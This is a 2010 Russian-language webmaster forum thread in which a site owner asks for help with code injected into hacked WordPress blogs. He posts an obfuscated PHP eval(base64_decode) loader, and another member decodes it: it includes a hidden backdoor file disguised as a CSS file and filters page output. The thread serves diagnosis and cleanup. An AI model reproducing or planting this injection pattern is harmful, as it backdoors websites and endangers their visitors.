Master-X
Форум | Новости | Статьи
Главная » Форум » Программинг, Скрипты, Софт, Сервисы » 
Тема: Хакнули пару блогов, кто поможет раскодировать код
цитата
04/07/10 в 10:36
 andreich
сабж хакнули и повесили на всех php страницах код

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL21ucm9tYW4vbWVzc2luYXNzYW5hbHJhcGUuY29tL2Nuc3RhdHMvbWFudWFsL2VuZ2xpc2gvaW1nL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

что эта мудянка делает ?
цитата
04/07/10 в 10:39
 ibiz
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/mnroman/messinassanalrape.com/cnstats/manual/english/img/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}
цитата
04/07/10 в 11:00
 andreich
ibiz: спасибо

но не понятно что она делает то ?
совсем плохо или не очень?
цитата
04/07/10 в 11:22
 ibiz
ничего плохого эти строки не делают, подключают какой-то файл, а вот этот какой-то файл хуй знает что делает icon_smile.gif
цитата
04/07/10 в 11:41
 andreich
бля не влазиет код из файла который подгружается icon_sad.gif
цитата
04/07/10 в 11:53
 ibiz
удаляй нахер это icon_smile.gif
там обфускация кода, лень разбираться что конкретно он делает
цитата
04/07/10 в 12:39
 w84me
в подключаемом файле бекдор
дорвейщеги балуются
он может на тебе доров поднимать

чисти все пхп файлы от кодеса этого, обновляй двигло, устанавливай правильные права типа 755 на файлы и папки
цитата
04/07/10 в 14:47
 Semen_ssr
Стукни в будни с защитой помогу, для взлома WP всего два варианта, их просто отсечь. А в бане гугла его оставить вообще в два счета.
Суки!!! Не умеют жить нормально.
цитата
04/07/10 в 19:54
 andreich
всем спасибо!
разобрался, взломали видимо из-за старой версии WP, блоги кстати не мои icon_smile.gif
цитата
04/07/10 в 21:36
 Semen_ssr
andreich писал:
всем спасибо!
разобрался, взломали видимо из-за старой версии WP, блоги кстати не мои icon_smile.gif


это тут ни при чем
цитата
04/07/10 в 21:48
 Sterx
шелл висящий на серваке пару лет, легко допишет 3 причину взлома icon_smile.gif
среди нас знаток? поведай миру, епт
цитата
04/07/10 в 22:11
 andreich
Хм на этом апаче висит с пару десятков WP, взломали только эти, на других версии другие, я в сетаки склоняюсь к тому что из-за версии WP произошел взлом
цитата
04/07/10 в 22:13
 FXIX
а нинада на хостах держать php-блоги icon_lol.gif. блоги должны лежать на твоем личном закрытом от http девелоп-хосте и на домены должны заливаться только чистые html-страницы
цитата
04/07/10 в 22:25
 andreich
FXIX: ну не все такие умные как ты smail54.gif
цитата
05/07/10 в 10:41
 w84me
semen_ssr фигню говоришь, старые версии более уязвимы, особенно пот автоматические атаки
и софт этот работает в определенных пределах. изучал его с полгода назад.


Эта страница в полной версии